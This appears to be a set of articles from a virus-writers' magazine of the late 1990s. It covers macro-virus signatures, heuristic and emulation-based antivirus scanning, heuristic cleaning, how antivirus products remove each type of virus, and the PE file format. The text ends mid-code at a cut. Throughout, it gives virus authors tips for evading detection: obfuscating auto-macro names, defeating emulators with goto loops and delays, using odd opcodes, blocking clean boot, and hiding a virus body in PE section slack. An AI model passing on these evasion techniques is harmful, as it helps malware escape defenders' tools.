    operator '='
    variable "b"
    operator '+'
    variable "c"

and some function:

    internal function MacroCopy
    string "my_macro"
    operator ','
    string "new_macro"
As you can easily see, this structure is very simple, and that is probably why the most recent technology is CRC.
Scanning Number of macro virii is growing day by day. This is a reason to use automatic systems to extract signatures.
Because they were coming with WB6, and WB6 has very simple structure, it seemed that CRC is the best. It is "absolutely" exact - so it can recognise sub variants, it is fast and easy to implement. May be it seems silly, but it was in days when everybody trusted that polymorphism in macro is not possible (what a mistake :-). So scanning algorithm is something like this: CRC all macros and check in database. Look at macros you found and if they describes whole variant virii is identified exact. If something is missing and I think it is enough: possible virus. You can see even now the legacy of those old good days. Many variants are differ just in one tab or space after end of macro. CRC rulez... Suddenly polymorphic ones came to the light of world and CRC became not very efficient. Became not but it is very comfortable to just run some program on your collection and to have signatures. The simplies way you can see is just to modify CRC algorithm. In those days polymorphism was when name of variable changes or something like that, so why not to skip whitespaces or variable names. And this is probably the final solution. So called smart-crc. Because of structure of VBA you can afford to skip variable names (and it is even more comfortable - who will search for it in tables). The structure of code is stored in code. It is enough to check the structure. You can easily see that macro is doing something like ? = ? + ?. And this is enough. With this technique you can identify at least 90% of current virii. Finally if you want polymorphism you NEED to change the structure of code. For example swap lines or add garbage code. And automatic AV technologies will be smashed to do ground. The next and very old way are scanstrings. It is easy to implement scanstring like scanner for macros. This may be exact because you can follow either structure of code or names. For example you may be looking for: ToolsMacro .Name = something with .Edit
These two methods are very easy to implement, yet efficient in use.
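The smart-CRC idea described above can be sketched on the scanner side roughly like this. It is only a minimal illustration, assuming the macro source is available as plain text; the keyword list, the tokenizer and the function names are hypothetical and not taken from any real product.

```python
import re
import zlib

# Hypothetical, deliberately short keyword list; a real scanner would carry
# the full keyword table of the macro language.
KEYWORDS = {"sub", "end", "if", "then", "else", "goto", "dim", "set", "for", "next"}

# String literals, identifiers (with optional $), numbers, any other single char.
TOKEN = re.compile(r'"[^"]*"|[A-Za-z_][A-Za-z0-9_$]*|\d+|\S')

def normalize(source: str) -> str:
    """Reduce macro source to its structure: drop whitespace, mask names."""
    out = []
    for tok in TOKEN.findall(source):
        if tok[0].isalpha() or tok[0] == "_":
            low = tok.lower()
            # Keywords carry structure, every other name becomes "?".
            out.append(low if low in KEYWORDS else "?")
        else:
            out.append(tok)
    return " ".join(out)

def smart_crc(source: str) -> int:
    """CRC32 over the normalized form instead of the raw macro text."""
    return zlib.crc32(normalize(source).encode("ascii", "replace"))
```

With this normalization `total = price + tax` and `a = b + c` both reduce to `? = ? + ?` and get the same checksum, while a change of structure (a different operator, an added statement) changes it.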
Some word about heuristics The main problem of macro virii is that there doesn't exist non virii macros (in fact they are very rare). So AV are not anxiety about how to detect, but how to distinguish between variants and how to find out macro is not virii :). It is easy to follow functions macro is using, so write a macro virii heuristics is easy. There is not problem to say: "this may be macro virii", because you can easily find "ToolsMacro .Edit", "Organizer .Copy" and other shit macro must be dealing with. In fact it is not enough. There are many legal self-installing macros using macro copying functions. In virii you can find usually somthing special ... Very important flags for heuristics may be: There is reference to AUTOMACRO in code (or macro itself is auto) (so it is clever to build macro name from substrings not containing whole macro name) There are common commands and constructions like ActiveWorkbook.Modules and so on (try to avoid very common constructions or use Set to substitute a part of command that is a bit hard to simulate) Bevare of construction like ...VirusProtection=0 (at least don't use value after command, it may be more visible for heuristics) Because structure of VBA is a bit more complex it is hard to simulate it. In fact all heuristics i know about are passive (it means they are just searching for something) and i don't know about any big advantages in more complex analysis. In fact simulate whole macro is difficult task - try to write whole VBA... I have heard someone emulates variables, but i don't believe it. And i am almost sure there is no full emulator of vba. So something like this a$="tomacro" b$="au" c$=b$+a$
is hardly ever suspicious for scanners. And I can't imagin that this can be suspicious: .... a$="" b$="" 10 c$=b$+a$ if c$<>"" goto 20 a$="tomacro" b$="au" goto 10 20 ....
Of course this is silly example, but i like to point that without code following emulation it is useless to have emulation of variables. And you may use as many jumps as you want or even functions, cycles or something even more evil. If you want to make day of aver harder just assign variables way that they can't be simulated from top to down. It means use goto to turn back with new values and heuristics will have to be much more complicated. So that is all i want to say ....
Hello, it's me again, if you haven't got bored of me already. Originally this part was supposed to be written by another famous coder, but he did not do it, being short of time. Unfortunately, I have much, much less time than he does. But never mind: we are going to look at heuristic principles in a short article, but be sure to read the main articles about antiviruses as well.
The main reason for heuristics is, as I already mentioned, to detect unknown viruses, as many viruses appear every month and it becomes difficult to keep track of them. It was first introduced by F-Prot (well, sort of; it is a bit hard to say whether we can call it heuristics), and the first real implementation came in the well-known TBAV.
First we should define what heuristics exactly is. I'll try in my own words: a heuristic scanner is a program (an antivirus, more exactly) that is able to detect viruses by analysis of their code, that is, of what they do. But deciding whether the given code is a virus or not isn't easy, even if it looks that way; it is difficult to make it reliable. If you have a look at the code of viruses, at many, many viruses, as avers did, you can easily tell the things that are common to all of them. These are the beginnings of heuristics: F-Prot used something that the av-community called "heuristic scan-strings". These are short scan-strings, searched for in the whole body, for typical constructions such as the write command, which is typically mov ah, 40h; mov cx, 1234h (size); int 21h. This is of course only an illustration; it can be done in many ways, but not so many that most of them can't be covered (using wild-card scan-strings). If several of these scan-strings are found, you can say there is probably a virus. But many regular programs written in assembler look this way, and to avoid false positives it is required to hit many of these strings before reporting a possible virus infection.
Some avers trusted F-Prot's reports of possible viruses, but in the form presented they were not quite reliable; moreover, it could not detect more complicated pieces, as it was set up for low sensitivity.
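A wild-card scan-string search of the kind described above could look roughly like the following sketch. The two patterns are illustrative encodings of common DOS calls (the write sequence from the text plus an open-for-read/write call), and the names and the threshold are assumptions, not anything taken from F-Prot.

```python
from typing import Dict, List, Optional, Set

WILD = None  # wildcard: matches any byte

# Illustrative patterns only; a real scanner would have many more.
PATTERNS: Dict[str, List[Optional[int]]] = {
    # mov ah,40h / mov cx,???? / int 21h
    "write_file": [0xB4, 0x40, 0xB9, WILD, WILD, 0xCD, 0x21],
    # mov ax,3D02h / int 21h
    "open_rw": [0xB8, 0x02, 0x3D, 0xCD, 0x21],
}

def match_at(data: bytes, pos: int, pattern: List[Optional[int]]) -> bool:
    """True if the pattern matches data starting at pos."""
    if pos + len(pattern) > len(data):
        return False
    return all(p is None or data[pos + i] == p for i, p in enumerate(pattern))

def find_hits(data: bytes) -> Set[str]:
    """Names of all patterns found anywhere in the body."""
    hits = set()
    for name, pattern in PATTERNS.items():
        if any(match_at(data, pos, pattern) for pos in range(len(data))):
            hits.add(name)
    return hits

def looks_suspicious(data: bytes, threshold: int = 2) -> bool:
    """Report only when several different patterns hit, to limit false positives."""
    return len(find_hits(data)) >= threshold
```

The threshold is the sensitivity knob: raising it gives fewer false positives on ordinary assembler programs, at the price of missing anything that uses only a few of the typical constructions.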
TBAV ruled the world for a short time at least. Franz Heldman presented a brand new technology called heuristics in excelent look. (but only for a first look). For a first look all stared in amazement: avers because they even never think about such a things (many of them are only doing their work without real invetions), and vx-ers because it was able to detect even viruses they are going to write. But reallity was a bit different: avers for a long time didn't count TBAV's heuristics into scanning methods at all, they reported heuristics as not reliable (mostly because they weren't able to replicate this technology even in simple look as TBAV has). Virus writers started to find a ways how to fool TBAV (as soon as they stopped affraid of it). Let's see how TBScan works: it uses passive heuristics (structured dissassembly) to analyze instructions. Main aim was as before - to detect usual code-sequences found in viruses. Tbscan marked them with letters by each file, and there were so many flags during years of development of tbav that covers whole alphabet plus some other characters. Starting from entry-point Tbscan checks instruction by instruction judging them and marking known code-sequences. But thats not enought, for sure. Also jumps are followed and on conditional jumps both paths are disassembled. However, as dissassembly is done in single-pass, a simple tricks that breakes intructions, etc can make tbscan to loose its track of code. Also it is easy to fool tbscan by doing the things in non-usual way or indirectly. As it disassembles the code, even simple mov ah, 3f; inc ah were enought to do so. Tbscan also has many false possitives due to its not-fully relieable technology - when tbscan lost track of codeflow (that happens quite often) it detects many flags on garbage code it finds. There were a quite long database of files that are known false postitives - some kind of anti-scan-strings, if found, heuristics is not
performed on such a file. TBAV's main weak point is it is so clear for everyone - even for virus writers they may easily guess how it works - and how to avoid to be caught. As soon as TBAV becomes popular, neartly everyone started to exclame their features they are tbav-proof. All is needed, during programmig, periodicaly run tbscan to see when it displays its flags. Well, main keypoints to keep tbav far from you is to use good encryption (that can't be passed by tbscan's decryptor), or to do things not as clearly as it is usual. Tbscan detects only usual schemes, so simple tricks like and-s, add/sub on comparing will work. However, tbscan is out of game today. There were also some plagiats, a german 'Suspiciouse' (as I remember), but all they went as unsucessful as tbav.
To fix these disadvantages it is possible to partialy find out the values of registers by semi-emulating of piece of code before key instruction (e.g. int 21). Only registers are emulated and memory access only for reading (not to damage memory). This is used for example by active heuristic scanners to analyze code they can't reach (we can call it local semi-emulation). In this stage doing mov/inc will not help, but doing rot-s or and-s instead of comparing will sure fool this alorythms.
Improoving heuristics - emulation There were a lot of big words how to do heuristics in real way, to do the things as they really are in file, but not runned. Someone may guess a single-stepping might be used, but in reality it weren't ever used for it. It is equivalent to running each file, but checking what you are executing. But your automatic debugging (its somesthing like it) can't be used due to many protective envelopes that are designed to crash debugers. In other words single stepping was never used for active heuristics as it can crash several times on a hard disc files per scan. I remember, for example, dedicated scanner for EMM1:Level_3 that uses single-stepping. It hangs several times in my utilities directory, runs many files (even pkzip), etc. In fact, only emulation can be used for active heuristics - that is to check for is file exactly doing, and to decide if it is viral code or not. In this point of view, there are two primary objectives. First one is a bit like before - to find out suspective code constructions, but it is less important now. The more important is to monitor activities that are really done. Let's imagine what virus usualy do - it tests something, becomes resident (if it is a resident virus), and infects files on some certain activity in system. Well, and for example becoming resident can be easily caught by active heuristics even if it is done in unreadable way - because it detects direct modifications (let's talk about dos now) of 0:[413] or MCBs. But what really defines a virus is a infection of other files - if emulated program searches for executables, modifies them (in order to replicate) it is virus nearl for sure. If virus only installs itself into memory, a simple tests are run in virual machine - a file is runned (and checked for infection), or opened for r/w, or opened on removable drive (likely copied to floppy). This usualy notices any virus. Now you can surely guess some tips how to fool them. 
But we have to continue: Because active heuristics is not 100% stable, there is usualy still engine for searching of typical constructions with local semi-emulation (mentioned before). Capabilities of virus can be detected also this way - even if they may not appear from the first view (or emulation ;-) Now have a look at limits of emulators - this is primary subject to be undetectable by active heuristics: there is virtual machine. Its main advantage and disatvantage at the same time. Of course, it is not V86 virtual machine you probably think, but emulated computer: it usualy has low memory (depends on implementation, even dos memory can be rather low!), i/o ports are not working - some very-very popular are emulated, but no more - because emulater can't allow to emulated program to write to ports, it can't guess real life of connected devices i.e. playing with some ports might cause emulator to loose track. Also, even emulated ROM might be writeable (but don't try it, because it can be real memory-mirrored ROM ;) Most of interrupts are not functional or are functional only in limited way. Int 21 and int 13 are of course
emulated as much as possible - because it is way of detection, but less known functions on int 21 possibly will not work (as well as other interrupts) Hardware interrupts are not functional. For some purpose the most usual - irq 0 (int 8) is possibly emulated, but for sure not with same periodicity as in reality, because emulator is much-much slower Thats also important - slow emulator is a very seriouse limit - users don't want to spend all their life by scanning disk and thats why emulation is time-limited (or by time, or by number of emulated instructions). For this reason emulation have to be aborted on timeout too (for this reason there is also usualy some dynamical adjust of lenght of emulation - if a very suspicious actions are found, more instructions are emulated). But timeout must be there, because emulator is not 100% functional (can't be by its definition) any many regular programs might crash or stay in infinite loop. And if it takes you really long to do real viral actions, emulator will abort on timeout sonner than it noticed your activity. (don't perform actions directly - no fast infection - that's not a feature, but a bug! wait a bit, be less deterministic) There might be bugs in emulator - but most usual instructions are working for sure. You may try some less usual and undocumented (like undocumented versions (aam), instructions not in matrix (sal and others), etc) but many of them are cpu-dependant. Moreover it tooks few minutes for avers to implement new instruction (if it is some easy one). Also you may test some memory wraps (oversegment and global memory wraps might not work, if they are computing adress lineary, SIB clipping might not be handled correctly), test if A20 mapping works. Also we are all 32-bit now: you can use 32bit registers, 32bit access and 32bit access modes. 
There may be sill bugs in 32bit opcodes, or they are not working at all There are also loading limits - because whole file (imagine 500k) can't be loaded and emulated - tooks too much time. Only a some part of file is loaded to memory and you can test it in some way. (like using host data as crypt-values). Enviroment is more-less static, interrupts are not really emulated (tooks too long to emulated whole int21, loading from fat, etc): as int instruction is emulated - it returns values depending on inputs or doesn't emulate at all (less important). Int chain is emulated (usualy) only if it is redirected - until it reaches dos entry. You can check if your interrupts are really passed to dos and processed. You can use some anti-trace tricks (all you sure know some), but good emulators can trace through anti-trace envelopes of other programs, so it will possibly go even through such a tricks Do the things less clearly, if your virus is clever enought not to be caught on very first executed exe-file, you have to be undetectable by passive part of heuristics as well (searching for instructions) ... try to imagine other limitations - because all is done by emulating you can surely guess others: emulation is slow, buggy, speed and size limited, and very incomplete. Currently leading heuristic scanners are NOD/iCE32 and Dr.Web - both of them are using mentioned technologies (with also mentioned limitations), but only for dos executables (how lucky). At the present time, none of them has 32bit emulator (I mean not written in 32bit, but fully emulating 32bit) and thats why they can't perform active heuristic for Windows executables (PE/LX), and viruses for windows are not that much affected by their heuristics power. For 32bit Win executables they are using only passive part - i.e. disassembly and searching for suspicious code constructions (typical viral sequences). 
These two antiviruses have far fewer false positives, as they need exact actions to judge a file as infected (but they use anti-scan-strings as well, because there are always false positives). But the most amazing thing about them is the quite detailed description they report for an infected file (especially NOD): they can find out whether the virus infects boot sectors as well as com/exe files, whether it infects sys files, whether it is resident, stealth, polymorphic, etc. You can see it nicely in NOD/iCE, in which the scan-strings can be turned off to use heuristics only. The hit rates when running heuristics only are quite impressive.
Other heuristic scanners
There are of course some other heuristic scanners in the world, but they are less important. AVP has a kind of active heuristics too, as part of its generic decryption engine. But as AVP is the highest-standard antivirus in the world and has a really large number of scanstrings, its heuristics can be set up for lower sensitivity, which also brings fewer false positives. The heuristics is also less visible, because it reports an unknown virus really rarely.
The situation is similar for Dr.Solomon's Toolkit (not Solomon's any more, of course). In our tests we modified the toolkit's viral database so that it had no scanstrings, to test heuristics only. The result was as expected: less than 70% (it varies slightly). You really don't need to be afraid of this heuristic engine if you can beat those mentioned above. Solomon added only a very simple one (like AVP) to get at least some hit rate on unknown viruses as well. But Solomon's policy for scan-strings was to add anything, no matter whether it is a virus, so they have the biggest hit rates without thinking about it (this is why I don't like it).
The worst heuristic scanner I know is AVG. Some time ago it had the same weak point as Tbscan, and even more so: it shows the emulation process (with optional step-by-step confirmation), so you can see the code and registers and easily test the bugs in it :) It was shown only to impress the audience, because it was really buggy and useless. It was improved several times, but without reasonable results; the first versions were extremely slow and buggy. Afterwards they used a new scanning/heuristic core (developed by someone else who joined their team), which is a bit faster and better, but still pretty weak.
To finish the overview of the others I have to mention NAI as well. This is rather easy, because NAI has no technology of its own (or really very little: only some programmers who downgrade bought technology by putting it together with others). NAI buys anything that can be bought; currently, as far as I know, they are using the Dr.Solomon engine, with roughly the same capabilities as Dr.Solomon. Maybe they'll try to buy another heuristic scanner... Who knows...
Heuristical cleaning
Now we are in the second, more or less important, chapter of this article. Heuristic cleaning was first presented by TBAV, in a program named Tbclean. But first we have to explain what heuristic cleaning is: cleaning a virus from a file without knowing the virus exactly, just by tracing it or by more complex automated analysis. Heuristic cleaning is less important than scanning, because it is much less reliable and also much less used. Moreover, it is the hit rate that gets analyzed in test tables, not these high-tech features.
Tbclean performs it in the easiest way. As TBAV lacked an emulator engine, Tbclean uses single-stepping to trace the program. You can surely guess it will not work in many cases. Of course: it crashes (the whole computer) on protective envelopes, and sometimes also on usual programs. But it sometimes works. The principle was simply to trace the virus, because a virus, when it does the usual things, reconstructs the host body and passes control there. The idea is to allow the reconstruction (but disallow installation, if possible), and on the jump to the host body to make a snapshot of the reconstructed file. Passing control back to the host was detected by a jump (or ret or whatever) to offset 100h (for com's), or a far jump (retf respectively) for exe files. Nearly every virus ends this way. All that is needed is to write the image back to disk and the work is done (it is very similar to exe-unpackers with tracing). To prevent installation, tbscan for example returns version 2 for the GetDosVersion call, which most viruses refuse. Simple and effective. But there were (are) also many other tricks. Some of them you may guess if you want to write a similar cleaner: preventing some instructions (like cli, i/o port access, hard stack modifications) and filtering interrupts (they are redirected so that nothing gets accidentally infected; int21, for example, usually returns an error (carry set)).
The big problem is to find out where to cut the file. The file can be easily reconstructed, but the cleaner doesn't know where to cut it. There are several possibilities:
- Cut it at the entry point (sounds good, but will damage the file if the virus doesn't put itself at the end). Tbclean always does this, which is why it can't clean Commander Bomber, for example.
- Leave it as it is (works almost every time, but an inactive virus body remains, and some stupid antiviruses might still detect it).
- Guess the virus infection type and virus size (much more complicated; only some of the newer cleaners do this).
Tbclean was the first, and really simple and buggy. It crashed very often, in many cases the reconstructed file was corrupted, and moreover, as it became pretty famous, there were tricks like the one in the virus Varicella, which really got executed when it was cleaned by tbclean (this virus made Franz Heldman really angry ;) But these days it is forgotten, as is the whole of TBAV.
Emulation makes it reliable
Yes, that's right. With the new generation of heuristic scanners (Dr.Web and NOD/iCE), there are better possibilities to clean a file, and not to crash. The principle remains the same: emulate the virus as much as possible, to find out as much information as possible. This is some deep heavy voodoo magic of avers, which is why only really few of them can do this. Of course, much better is exact disinfection, which is much more valuable (like AVP has), but to impress us (vx-ers) and other avers, this magic is here ;-) At the present time, however, it is functional enough only in NOD/iCE (pretty impressive, but due to the mentioned limitation of their emulator it doesn't work for 32bit files (win)). Heuristic cleaning is also used in AVG, but I would say the same as about their heuristic scanner: it was really poor some time ago, and after the core upgrade it is still not enough. Finally, there is Dr.Solomon (which is now also used as the core engine in NAI's products), but it doesn't perform generic cleaning at all (I mean cleaning of unknown viruses). As far as I am informed, it is only used to disinfect viruses that are positively known as cleanable. That's why you will not notice any heuristic cleaning at all.
Referring to the things above, I will focus primarily on NOD/iCE, as it uses imho the best technologies of all those mentioned. The generic idea is the same: to emulate the virus so that it reconstructs the host file, and to use the retrieved information to repair the host. All is done in an emulated virtual PC, with emulated disks. The simplest way of disinfection is to save the reconstructed file and cut out the virus. As there are several ways of appending a virus to a file, the technique for cutting it out may differ slightly. A clever technique, if the virus works fine in the emulator, is to virtually infect several virtual files (goats) to find out the size of the virus and where the virus is stored (by diffing with the original file). This way they can guess the infection methods of the virus nearly exactly.
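The goat-diffing step can be illustrated with a small sketch. This is not how NOD/iCE does it (the text gives no implementation details); it is just a minimal comparison of a clean goat with its modified copy, and the names `Guess`, `guess_infection` and the `max_patch` limit are assumptions made for the example.

```python
from typing import NamedTuple, Optional

class Guess(NamedTuple):
    kind: str                   # "prepending", "appending" or "unknown"
    body_offset: Optional[int]  # where the added body starts in the file
    body_size: int              # how much the file grew

def guess_infection(clean: bytes, infected: bytes, max_patch: int = 32) -> Guess:
    """Compare a clean goat file with its modified copy."""
    growth = len(infected) - len(clean)
    if growth <= 0:
        return Guess("unknown", None, 0)
    # Whole original intact at the end: something was put in front of it.
    if infected.endswith(clean):
        return Guess("prepending", 0, growth)
    # Original intact except for a few patched bytes at the start:
    # something was added behind it and the start was redirected.
    head = infected[:len(clean)]
    changed = [i for i, (a, b) in enumerate(zip(clean, head)) if a != b]
    if not changed or changed[-1] < max_patch:
        return Guess("appending", len(clean), growth)
    return Guess("unknown", None, growth)
```

Running it over several goats of different sizes and checking that `body_size` stays constant is what lets the cleaner trust the guess; a varying size would point to padding or a polymorphic body and needs the "alchemy" mentioned below.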
For combined boot/exe/com viruses, as they are usualy installing itself to mbr, a virtual reboot is done to activate them in virtual pc after they installs into virtual mbr. (oops, so virtually ;) After guessing the size and knowing where virus stores itself in file, a real infected file might be run (virtually, again) to repair host, find out entry-point, and cut it using informations retrieved before (if they are not available, some alchemy is done or virus body is left there). This way it looks simply, but isn't. I guess heuristics scanning and heuristics cleaning is top high-tech technology avers are using now (also reffer to my overview of antivirus methods). Even if the principles and ideas are simple there is lots of things to be done to make virus work in virtual pc, so the complications you might prepare for heuristics (cleaning especialy) might be awarded by your success. Good luck! flush
Well, dear virus friends, this article may be a little bit unfriendly, but our mag is an open forum. And besides, we do not have a CDA (now, after a couple of weeks, I don't know what this stands for). The main goal of this article is just to show our vx community how easily our viruses can be removed when necessary.
AV Companies
There is a shitload of viruses and virus strains around, and many of them are "in the wild". The estimated virus count is about 20000+, and we also have more than 3500 macroviruses. It is not likely that any AV software can successfully detect all the viruses. Nor can it remove them all. But they are at least trying.
A. Overwriting viruses
These viruses are basically uncleanable. No doubt. This category of viruses is lame. And the lameness of this virus type is also the reason why the infected files cannot be cleaned to their original state. They can be deleted or renamed, but the only way to restore infected files to their original state is to use backup copies (if they exist).
B. Non overwriting viruses
This type of virus can be removed in up to 100 per cent of cases. The reason is that a virus of this category has to launch the host at some moment. At this specific point in time the host file is rebuilt as if it were not infected, or rather, the file is executed as if not infected. But let's take a closer look at every type of non-overwriting virus.
B1. FILE VIRUSES
1. Companion viruses
This type of virus takes advantage of the priority of launching executable files with the same name but different extensions. Sorted from highest to lowest priority, the files are launched in the following order: 1. com 2. exe 3. bat
The virus simply creates a file with the same name, but with an extension having higher priority, containing a copy of the virus; or it changes the file extension to one with lower priority and writes the viral body into a file with the original name and extension. As the virus doesn't modify the infected file in any way, it is trivial to remove the virus. The structure of the file can help to determine the original file extension. Any file starting with the obvious 'MZ' or 'ZM' is handled as an EXE file by the system when it has a specific minimal length. This limit seems to be 26 bytes. The following code

    db  'MZ'
    db  21 dup ('A')
    int 20h

exits without any problems, but when you replace the second line with

    db  22 dup ('A')

you get the nice message "Program too big to fit in memory". Thus, first remove the file with the viral body. Then check the structure of the file with the same name and rename it back to its original extension. And bingo.
2. Linking viruses (DIR II and its kind)
This type of virus doesn't change anything in the infected file. It just links the starting cluster of the file to the viral body located somewhere on the disk. The main symptom one can see is a lot of cross-linked files all around the disk drive. To "clean" this kind of virus one needs to link the starting cluster of the file back to the original one. And do not forget to remove the virus body from the hard disk. For information concerning FAT 32 take a look at the great article A fool named FAT 32 by flush.
3. Com viruses
Basically, there are two types of COM viruses. The first type uses the "classic" way to receive control. It writes a jump to the virus body at the beginning of the file and saves the original bytes somewhere in the virus body.

            JMP virus (E9 xx xx)
            Rest of the program
    virus:  Virus body
            Original bytes

To remove a virus of this kind, it is necessary to locate the original bytes from the file start inside the virus body and restore the start of the file. Then the file is as it was before infection (but still contains the viral body). The last step in the process of removing the virus is to cut off the viral body. In most cases the best cut position is (xx xx)+3, where xx xx is the displacement of the initial jump. In the most typical case the whole body of the virus is removed. In some rare exceptions the file will still contain some bytes of the viral body.
The second approach is more complex. The virus body is written to the beginning of the file and the rest of the file is just moved behind the virus body. On execution the virus moves the file to its "normal" position and launches it.

            Virus body
            Program moved up

The solution is very handy in this case. All the averz have to do is to move the program to the beginning of the file. Nothing less, nothing more. As a possible "D-fence", a combination of both infection methods above can be used. But the removal will still be very easy.
4. Exe viruses
Typically, exe-infecting viruses append the viral body to the end of the file, and then the virus modifies the EXE header in order to launch the virus before the infected file.

            EXE header (CS:IP)
            Program
            Virus body

It is certain that somewhere in the virus at least the original values of Exe_CS and Exe_IP are stored, optionally also Relo_SS and/or Relo_SP, or even the whole original EXE header. The virus is removed in the following steps. At the very beginning Exe_CS and Exe_IP are located and their values restored. Optionally Relo_SS and Relo_SP are restored too. Then it is necessary to compute the size of the file in pages and store these two words at offsets 2 and 4 in the header. Now it is possible to save the restored file header to the file. The last step is cutting the file to its original size. If the virus contains the whole original header (as most stealth viruses do), the removal is even easier than described above. All the cleaning amounts to is locating the original header inside the virus and saving it at offset 0 in the file. Then naturally the avers cut off the virus body and .... Done!
Well, exe files: the above stuph was all about the DOS times. Now the PE file is the target. And removing virus infections here can be even easier. If the bad aver is really lazy, all he needs to do is skip the virus. In other words, he has to set the original entry point RVA in the file. He doesn't need to care about the viral body or the added section. So dudes, in order to make their task harder, do some unusual operation with the saved bytes necessary to hand the code flow over to the infected host.
5. Sys viruses
Device drivers are the rarest target for viruses. Since Dark Angel published his tutes, everyone can infect *.sys files. The trick is simple as hell: it uses a feature of SYS philes, the chaining of drivers in a SYS file. All we need to do to infect a SYS file is to add the necessary code to the host and change the first dword of the file to point to the header of our new character device. So easy it is. So is the cleaning. A very lazy aver can assume that there is always only one driver in a SYS file. The cleaning procedure is then:
1. take a word from offset BOF+2 in the file
2. lseek to that location
3. cut the file here
4. lseek to BOF
5. write these 4 bytes: 0xFF 0xFF 0xFF 0xFF to the BOF
They could also take a more optimised way: traverse all the headers until they find the last one. This is the beginning of the virus, so cleaning is easy then.
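Going back to the DOS EXE case in point 4: the "size of the file in pages" stored at offsets 2 and 4 of the header is a pair of words, the number of bytes used in the last 512-byte page and the total number of pages. A minimal sketch of the arithmetic a cleaner has to redo after cutting the file, assuming the restored file has no overlay so that the image size equals the file size (the function names are made up for the example):

```python
import struct

PAGE = 512  # size of one page in the DOS EXE header

def exe_size_fields(file_size: int):
    """Return (bytes_in_last_page, page_count) for a file of the given size."""
    pages = (file_size + PAGE - 1) // PAGE  # round up to whole pages
    last = file_size % PAGE                 # 0 means the last page is full
    return last, pages

def patch_size_fields(header: bytes, file_size: int) -> bytes:
    """Return a copy of the header with the words at offsets 2 and 4 rewritten."""
    last, pages = exe_size_fields(file_size)
    return header[:2] + struct.pack("<HH", last, pages) + header[6:]
```

For example, a file cut back to 1025 bytes gets the pair (1, 3): three pages, with one byte used in the last one.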
B2. Boot viruses
A boot virus occupies the MBR of the hard disk or the boot sector of the drive. In the most typical case the virus also stores the original, uninfected MBR or boot sector "somewhere" on the infected media. To wipe a boot virus it is very efficient to take the sector with the stored MBR/boot sector and restore it to its original location. Another method is to use some kind of generic MBR/boot sector when the original is not available. To try to fuck up with the averz, all you have to do is not to allow a clean boot. Could be arranged with a little bit of phantasy and code ...
B3. Macroviruses
As for the macroviruses, there is a very simple workaround: all you have to do is delete the macros. Sure, this is not the best solution, but it is quite reliable. You are left with no macros, viral or non-viral. Non-viral macros are, let's say, casualties of the war.
B4. Multipartite viruses
Basically these viruses have multiple targets of infection. Therefore cleaning such a thing is more complex: you have to clean e.g. the boot sector and the files, or documents and philes. With lots of possibilities, AVers can make some errors :)))
B5. Special viruses
These require special methods of removal, if removal is possible at all. Here also belong the viruses with some kind of "life insurance", like One_half with its hard disk encryption or Griyo's Implant with its cyclic partition. If an AVer doesn't pay attention to such a special method of infection, he can expect a lot of hot line traffic.
C. Closing words
Due to the increasing number of viruses, AVers don't have time to clean all of them. But they are at least trying, so make their job so time-consuming that it will not be worth the money.
For the people who have no clue about the thing (and this article is dedicated to them), and for full coverage: PE (Portable Executable) is the format of executable files of all newer Window$. In comparison with the now nearly extinct NE species, PE brings some substantial advantages. The most important one is support of the 32-bit FLAT model. In this memory model the segments (as we know them from DOS or 16-bit protected mode) have practically lost their meaning. Every process has its own address space, so we do not need to solve the old problem of where to place some piece of code in order not to fuck up (overwrite) another proggy, and so on. Due to this feature every program can decide on its own, with practically no limitations, where it will store whatever it wants. If the program wants to have some weird string at address 0x1234567, it can expect the string will really be there. Therefore it is not necessary for the program to have a relocation table (but there are some reasons why this table is linked to the program by default). As I mentioned before, segments in such a mode have no special or important purpose. After the start the program already has CS, DS and ES set to segments covering the whole address space (4GB in size), and the program can access any desired address. Of course, if the system thinks the program doesn't have access to an address (if there is something important at this address [this is not the case under W95 or W98] or there is nothing at this address), an attempt to access such an address can generate an exception. Such an exception can of course be intercepted, and the lamer at the keyboard will have no clue about it :-)... But this is far too advanced for now...
As we want to have an overview of how the address space looks, here it is:

    0h - 3FFFFFh             reserved, should not be accessed
    400000h - 7FFFFFFFh      process private area - all the sections from the EXE are mapped here
    80000000h - FFFFFFFFh    shared area - various DLL, VxD and some other monsters

Well, as a kick start that should be enough, let's go to the PE itself. PE is a format suspiciously similar to the COFF format used on Unix systems. It consists of headers and a data area which is directly mapped into the address space of the process. The headers themselves are stored before the start of the code, so if you want to find them, align the address to 4kB and track back until you find a page starting with 'MZ'. Of course don't forget to set an exception handler for page faults. EXE files are by default mapped starting at address 0x400000. This starting address is called ImageBase. It should be no surprise that the ImageBase can be set during the linking process. When the file is loaded a couple of things happen (shit is not one of them):

1. headers are loaded into some buffer
2. all the sections are mapped to some space; in order to avoid relocations, ImageBase is preferred. If the ImageBase is not free and the program has a relocation table, the file is mapped elsewhere and relocated.
3. DLLs needed by the program are mapped into the process
4. pointers to imported functions are fixed
5. stack is set up
6. program is executed (jump to the entry point)

note: i don't guarantee the steps above are performed in the given order ;-)
As for DLL mapping, the process is similar, but the jump to the entry point is not "just a jump": the entry point receives a reason value (on Win32 it is the second argument, fdwReason, of the DLL entry point) which tells the library why it is being called:

DLL_PROCESS_ATTACH = 1    library is mapped to a new process and should initialise its global data
DLL_THREAD_ATTACH  = 2    a new thread attaches to the library, but the data have already been initialised (DLL_PROCESS_ATTACH already performed)
DLL_THREAD_DETACH  = 3    some thread freed the library
DLL_PROCESS_DETACH = 0    process terminates, library is being unmapped and should terminate its activity
note: most likely the calling of the library entry point can be disabled in some way
note: naturally, the library doesn't have its own stack

For compatibility reasons every PE file starts with an MZ header, where at offset 0x3C there is a dword pointer to the PE header. The file is divided into something like sectors (of variable size, by default 0x200 - FileAlignment), and the file headers (all together, not each one separately) and the sections are aligned to that size. This creates some space for storing the virus body (but under 4000 bytes), because in every section we can gain approx. 100h bytes and PE files do not usually have too many sections. This strategy is used by CIH. As for the structure of the headers, i strongly recommend looking at the file WINNT.H. The file header has the following structure:

struct PE_FILE_HEADERS {
    DWORD magic;                            // = 0x00004550 ("PE\0\0")
    _IMAGE_FILE_HEADER primary_header;
    _IMAGE_OPTIONAL_HEADER optional_header;
    _IMAGE_SECTION_HEADER section_headers[primary_header.NumberOfSections];
    BYTE dummy[aligned to optional_header.FileAlignment];
};
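The header layout above can be checked with a few lines of C. This is only a minimal sketch for inspecting a file that has already been read into memory; the names read_u32le and pe_header_offset are made up for this illustration and are not part of WINNT.H or any Windows API.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value from a byte buffer. */
uint32_t read_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
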